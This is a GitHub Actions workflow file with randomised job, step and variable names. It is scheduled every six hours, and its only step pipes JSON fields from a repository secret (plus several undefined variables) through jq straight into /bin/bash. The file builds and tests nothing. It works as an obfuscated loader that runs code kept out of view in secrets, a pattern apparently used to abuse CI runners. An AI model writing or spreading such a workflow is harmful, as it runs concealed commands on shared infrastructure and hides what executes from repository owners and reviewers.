name: guotuobei5748
on:
  workflow_dispatch:
  schedule:
    - cron: '22 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: guotuobei5748
        env:
          wqyx21: ${{ secrets.wqyx21 }}
        run: |
          echo $wqyx21 | jq -r .kozhx6276 | /bin/bash
          echo $vtqgq01 | jq -r .thor813 | /bin/bash
          echo $fn4 | jq -r .kqvuq0850 | /bin/bash
          echo $l78 | jq -r .trq56021 | /bin/bash
          echo $wvj6944 | jq -r .vto9 | /bin/bash
          echo $yldx93 | jq -r .nnlt2750 | /bin/bash
          echo $skjh4229 | jq -r .bvxll4422 | /bin/bash

